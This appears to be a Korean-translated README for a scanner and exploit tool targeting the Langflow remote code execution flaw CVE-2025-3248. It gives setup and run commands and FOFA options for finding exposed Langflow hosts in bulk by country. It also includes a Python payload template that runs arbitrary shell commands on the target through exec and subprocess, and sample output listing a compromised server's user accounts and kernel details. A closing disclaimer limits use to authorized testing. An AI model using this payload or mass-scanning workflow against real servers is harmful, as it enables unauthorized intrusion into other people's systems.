
Langflow 애플리케이션의 CVE-2025-3248 취약점 스캐너입니다. Langflow 애플리케이션에서 CVE-2025-3248 취약점을 스캔하는 도구입니다.
中文 | 영어
Langflow 애플리케이션의 CVE-2025-3248을 위한 취약점 스캐너입니다.
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
# After you finish editing
mv .env.example .env
python main.py -t https://target.com
python main.py --fofa-email [email protected] --fofa-key your_api_key
-t, --target: 스캔할 대상 URL--fofa-email: FOFA API 이메일--fofa-key: FOFA API 키--fofa-query: FOFA 검색 쿼리 (기본값: 'app="LOGSPACE-LangFlow"')--country: 국가 코드로 결과 필터링 (예: CN, US)--max-pages: 가져올 최대 FOFA 페이지 수 (기본값: 5)--page-size: 페이지당 결과 수 (기본값: 100)--timeout: 요청 시간 초과(초) (기본값: 10)--no-verify: SSL 인증 비활성화--threads: 동시 스캔을 위한 스레드 수 (기본값: 5)-f, --file: 페이로드로 사용할 사용자 정의 Python 파일Python 파일을 생성하여 사용자 정의 페이로드를 만들 수 있습니다:
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
pass
그런 다음 다음과 같이 사용합니다:
python main.py -t https://target.com -f your_payload.py
[+] User Accounts:
root UID:0 GID:0 Home:/root Shell:/bin/bash
daemon UID:1 GID:1 Home:/usr/sbin Shell:/usr/sbin/nologin
bin UID:2 GID:2 Home:/bin Shell:/usr/sbin/nologin
sys UID:3 GID:3 Home:/dev Shell:/usr/sbin/nologin
sync UID:4 GID:65534 Home:/bin Shell:/bin/sync
games UID:5 GID:60 Home:/usr/games Shell:/usr/sbin/nologin
man UID:6 GID:12 Home:/var/cache/man Shell:/usr/sbin/nologin
lp UID:7 GID:7 Home:/var/spool/lpd Shell:/usr/sbin/nologin
mail UID:8 GID:8 Home:/var/mail Shell:/usr/sbin/nologin
news UID:9 GID:9 Home:/var/spool/news Shell:/usr/sbin/nologin
uucp UID:10 GID:10 Home:/var/spool/uucp Shell:/usr/sbin/nologin
proxy UID:13 GID:13 Home:/bin Shell:/usr/sbin/nologin
www-data UID:33 GID:33 Home:/var/www Shell:/usr/sbin/nologin
backup UID:34 GID:34 Home:/var/backups Shell:/usr/sbin/nologin
list UID:38 GID:38 Home:/var/list Shell:/usr/sbin/nologin
irc UID:39 GID:39 Home:/run/ircd Shell:/usr/sbin/nologin
_apt UID:42 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
nobody UID:65534 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
user UID:1000 GID:0 Home:/app/data Shell:/bin/sh
[+] System Details:
Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux
⚠️ 면책 조항 이 도구는 합법적인 목적으로만 사용됩니다. 교육 목적, 내부 기업 보안 테스트 또는 승인된 환경에서의 사용을 위해 설계되었습니다. 승인되지 않은 시스템, 네트워크 또는 장치에서 이 도구를 사용하는 것은 엄격히 금지되며, 관련 법률 및 규정을 위반할 수 있습니다.
사용자는 자신의 행동에 대한 모든 법적 책임을 져야 합니다. 저자와 기여자는 이 도구의 부적절한 사용으로 인한 손실, 데이터 유출 또는 법적 결과에 대해 책임을 지지 않습니다.
⚠️ 불법 공격에 사용하지 마십시오. 승인되지 않은 시스템에서 이 도구를 배포하거나 실행하려고 시도하지 마십시오.